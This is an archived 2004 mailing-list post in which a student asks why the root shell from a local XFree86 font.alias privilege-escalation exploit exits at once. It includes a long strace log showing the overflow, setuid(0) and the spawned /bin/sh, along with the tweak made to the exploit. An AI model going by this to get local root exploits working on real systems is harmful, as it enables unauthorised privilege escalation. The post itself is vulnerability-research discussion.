Vulnerability Development mailing list archives
XFree86 font.alias exploit hangup....
From: Dev <u02113 () cs unipune ernet in>
Date: 22 Feb 2004 10:51:18 -0000
Hello ppl, Apart from the few tweaks required to make most exploits work (especially recently like changing /tmp//id to /bin//sh in the Xfree86 font.alias local exploit t al.), I guess some more work is required to get the root shell. My problem is that once i launch the exploit the X display appears momentarily & the keyboard locks up * so now i can only access the box from the network & on a different shell. Offsets etc are all fine & an STRACE yields the following log which does indicate that the exploit was successful & execve'd /bin//sh. But I am confised about the last few lines of the strace log. [ffffe002] fcntl64(8, F_SETFL, O_RDWR|O_NONBLOCK|O_ASYNC) = 0 [ffffe002] getpid() = 997 [ffffe002] fcntl64(8, F_SETOWN, 997) = 0 [ffffe002] rt_sigaction(SIGIO, {0x809d800, [IO], SA_RESTORER, 0x420275c8}, {0x809d800, [IO], SA_RESTORER, 0x420275c8}, 8) = 0 [ffffe002] rt_sigprocmask(SIG_UNBLOCK, [IO], NULL, 8) = 0 [ffffe002] rt_sigprocmask(SIG_BLOCK, [IO], [], 8) = 0 [ffffe002] rt_sigprocmask(SIG_UNBLOCK, [IO], NULL, 8) = 0 [ffffe002] brk(0) = 0x8735000 [ffffe002] brk(0x8736000) = 0x8736000 [ffffe002] open("/tmp/fonts.dir", O_RDONLY) = 9 [ffffe002] fstat64(9, {st_mode=S_IFREG|0600, st_size=68, ...}) = 0 [ffffe002] fstat64(9, {st_mode=S_IFREG|0600, st_size=68, ...}) = 0 [ffffe002] mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40027000 [ffffe002] read(9, "1\naaaa.pcf -aaaa-fixed-small-a-s"..., 4096) = 68 [ffffe002] read(9, "", 4096) = 0 [ffffe002] brk(0) = 0x8736000 [ffffe002] brk(0x8739000) = 0x8739000 [ffffe002] read(9, "", 4096) = 0 [ffffe002] close(9) = 0 [ffffe002] munmap(0x40027000, 4096) = 0 [ffffe002] open("/tmp/fonts.alias", O_RDONLY) = 9 [ffffe002] fstat64(9, {st_mode=S_IFREG|0600, st_size=1059, ...}) = 0 [ffffe002] fstat64(9, {st_mode=S_IFREG|0600, st_size=1059, ...}) = 0 [ffffe002] mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40027000 [ffffe002] read(9, "|\336\377\277|\336\377\277|\336\377\277|\336\377\277|\336"..., 4096) = 1059 [ffffe002] brk(0) = 0x8739000 [ffffe002] brk(0x873a000) = 0x873a000 [ffffe002] close(9) = 0 [ffffe002] munmap(0x40027000, 4096) = 0 [bfffffd4] setuid(0) = 0 ===>> [bfffffec] execve("/bin//sh", ["/bin//sh"], [/* 96 vars */]) = 0 [4001117d] uname({sys="Linux", node="cs109.cs.unipune.ernet.in", ...}) = 0 [4000fb85] brk(0) = 0x80e5b54 [400110bd] old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40016000 [40010b44] open("/etc/ld.so.preload", O_RDONLY) = -1 ENOENT (No such file or directory) [40010b44] open("/etc/ld.so.cache", O_RDONLY) = 9 [400109bd] fstat64(9, {st_mode=S_IFREG|0644, st_size=115094, ...}) = 0 [400110bd] old_mmap(NULL, 115094, PROT_READ, MAP_PRIVATE, 9, 0) = 0x40017000 [40010b7d] close(9) = 0 [40010b44] open("/lib/libtermcap.so.2", O_RDONLY) = 9 [40010bc4] read(9, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\r\0"..., 512) = 512 [400109bd] fstat64(9, {st_mode=S_IFREG|0755, st_size=11784, ...}) = 0 [400110bd] old_mmap(NULL, 14856, PROT_READ|PROT_EXEC, MAP_PRIVATE, 9, 0) = 0x40034000 [400110bd] old_mmap(0x40037000, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 9, 0x2000) = 0x40037000 [40010b7d] close(9) = 0 [40010b44] open("/lib/libdl.so.2", O_RDONLY) = 9 [40010bc4] read(9, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\360\26"..., 512) = 512 [400109bd] fstat64(9, {st_mode=S_IFREG|0755, st_size=15084, ...}) = 0 [400110bd] old_mmap(NULL, 8620, PROT_READ|PROT_EXEC, MAP_PRIVATE, 9, 0) = 0x40038000 [400110bd] old_mmap(0x4003a000, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 9, 0x2000) = 0x4003a000 [40010b7d] close(9) = 0 [40010b44] open("/lib/tls/libc.so.6", O_RDONLY) = 9 [40010bc4] read(9, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0`V\1B4\0"..., 512) = 512 [400109bd] fstat64(9, {st_mode=S_IFREG|0755, st_size=1531064, ...}) = 0 [400110bd] old_mmap(0x42000000, 1257224, PROT_READ|PROT_EXEC, MAP_PRIVATE, 9, 0) = 0x42000000 [400110bd] old_mmap(0x4212e000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 9, 0x12e000) = 0x4212e000 [400110bd] old_mmap(0x42131000, 7944, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x42131000 [40010b7d] close(9) = 0 [400110bd] old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x4003b000 [400016f3] set_thread_area({entry_number:-1 -> 6, base_addr:0x4003b280, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0 [40011101] munmap(0x40017000, 115094) = 0 [ffffe002] rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0 [ffffe002] open("/dev/tty", O_RDWR|O_NONBLOCK|O_LARGEFILE) = -1 ENXIO (No such device or address) [ffffe002] ioctl(0, SNDCTL_TMR_TIMEBASE, 0xbffff5c0) = -1 ENOTTY (Inappropriate ioctl for device) [ffffe002] brk(0) = 0x80e5b54 [ffffe002] brk(0) = 0x80e5b54 [ffffe002] brk(0x80e6000) = 0x80e6000 [ffffe002] brk(0) = 0x80e6000 [ffffe002] brk(0x80e7000) = 0x80e7000 [ffffe002] getuid32() = 0 [ffffe002] getgid32() = 0 [ffffe002] geteuid32() = 0 [ffffe002] getegid32() = 0 [ffffe002] rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0 [ffffe002] time(NULL) = 1077445115 [ffffe002] brk(0) = 0x80e7000 [ffffe002] brk(0x80e8000) = 0x80e8000 [ffffe002] ioctl(0, SNDCTL_TMR_TIMEBASE, 0xbffff710) = -1 ENOTTY (Inappropriate ioctl for device) [ffffe002] brk(0) = 0x80e8000 [ffffe002] brk(0x80e9000) = 0x80e9000 [ffffe002] open("/etc/mtab", O_RDONLY) = 9 [ffffe002] fstat64(9, {st_mode=S_IFREG|0644, st_size=337, ...}) = 0 [ffffe002] mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40017000 [ffffe002] read(9, "/dev/hda1 / ext3 rw 0 0\nnone /pr"..., 4096) = 337 [ffffe002] close(9) = 0 [ffffe002] munmap(0x40017000, 4096) = 0 [ffffe002] open("/proc/meminfo", O_RDONLY) = 9 [ffffe002] fstat64(9, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0 [ffffe002] mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40017000 [ffffe002] read(9, " total: used: free:"..., 4096) = 650 [ffffe002] close(9) = 0 [ffffe002] munmap(0x40017000, 4096) = 0 [ffffe002] brk(0) = 0x80e9000 [ffffe002] brk(0x80ea000) = 0x80ea000 [ffffe002] rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0 [ffffe002] rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0 [ffffe002] rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0 [ffffe002] rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0 [ffffe002] rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_DFL}, 8) = 0 [ffffe002] rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_DFL}, 8) = 0 [ffffe002] rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0 [ffffe002] rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0 [ffffe002] uname({sys="Linux", node="cs109.cs.unipune.ernet.in", ...}) = 0 [ffffe002] brk(0) = 0x80ea000 [ffffe002] brk(0x80ec000) = 0x80ec000 [ffffe002] getcwd("/root", 4096) = 6 [ffffe002] getpid() = 997 [ffffe002] getppid() = 996 [ffffe002] socket(PF_UNIX, SOCK_STREAM, 0) = 9 [ffffe002] connect(9, {sa_family=AF_UNIX, path="/var/run/.nscd_socket"}, 110) = -1 ENOENT (No such file or directory) [ffffe002] close(9) = 0 [ffffe002] open("/etc/nsswitch.conf", O_RDONLY) = 9 [ffffe002] fstat64(9, {st_mode=S_IFREG|0644, st_size=1718, ...}) = 0 [ffffe002] mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40017000 [ffffe002] read(9, "#\n# /etc/nsswitch.conf\n#\n# An ex"..., 4096) = 1718 [ffffe002] read(9, "", 4096) = 0 [ffffe002] close(9) = 0 [ffffe002] munmap(0x40017000, 4096) = 0 [40010b44] open("/etc/ld.so.cache", O_RDONLY) = 9 [400109bd] fstat64(9, {st_mode=S_IFREG|0644, st_size=115094, ...}) = 0 [400110bd] old_mmap(NULL, 115094, PROT_READ, MAP_PRIVATE, 9, 0) = 0x40017000 [40010b7d] close(9) = 0 [40010b44] open("/lib/libnss_files.so.2", O_RDONLY) = 9 [40010bc4] read(9, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\35\0"..., 512) = 512 [400109bd] fstat64(9, {st_mode=S_IFREG|0755, st_size=52472, ...}) = 0 [ffffe002] brk(0) = 0x80ec000 [ffffe002] brk(0x80ed000) = 0x80ed000 [400110bd] old_mmap(NULL, 47068, PROT_READ|PROT_EXEC, MAP_PRIVATE, 9, 0) = 0x4003c000 [400110bd] old_mmap(0x40047000, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 9, 0xa000) = 0x40047000 [40010b7d] close(9) = 0 [40011101] munmap(0x40017000, 115094) = 0 [ffffe002] open("/etc/passwd", O_RDONLY) = 9 [ffffe002] fcntl64(9, F_GETFD) = 0 [ffffe002] fcntl64(9, F_SETFD, FD_CLOEXEC) = 0 [ffffe002] fstat64(9, {st_mode=S_IFREG|0644, st_size=2407, ...}) = 0 [ffffe002] mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40017000 [ffffe002] read(9, "root:x:0:0:root:/root:/bin/bash\n"..., 4096) = 2407 [ffffe002] close(9) = 0 [ffffe002] munmap(0x40017000, 4096) = 0 [ffffe002] getpgrp() = 997 [ffffe002] rt_sigaction(SIGCHLD, {0x8076d30, [], SA_RESTORER, 0x420275c8}, {SIG_DFL}, 8) = 0 [ffffe002] rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0 [ffffe002] fcntl64(0, F_GETFL) = 0x1 (flags O_WRONLY) [ffffe002] fstat64(0, {st_mode=S_IFREG|0644, st_size=51131, ...}) = 0 [ffffe002] _llseek(0, 0, [51131], SEEK_CUR) = 0 [ffffe002] brk(0) = 0x80ed000 [ffffe002] brk(0x80ef000) = 0x80ef000 [ffffe002] rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0 ==> whats this ??? [ffffe002] read(0, 0x80ed008, 8176) = -1 EBADF (Bad file descriptor) ==> so what happens to my root shell here?? [ffffe002] exit_group(0) = ? Plz tell me as to whether my root shell has exited because of some error in the last few calls? Thanks & regards Devrat Mittal u02113 () cs unipune ernet in Department of computer Science University of Pune.
Current thread:
- XFree86 font.alias exploit hangup.... Dev (Feb 25)
- Re: XFree86 font.alias exploit hangup.... lazy (Feb 27)
- Re: XFree86 font.alias exploit hangup.... Marco Ivaldi (Feb 29)
- Re: XFree86 font.alias exploit hangup.... lazy (Feb 27)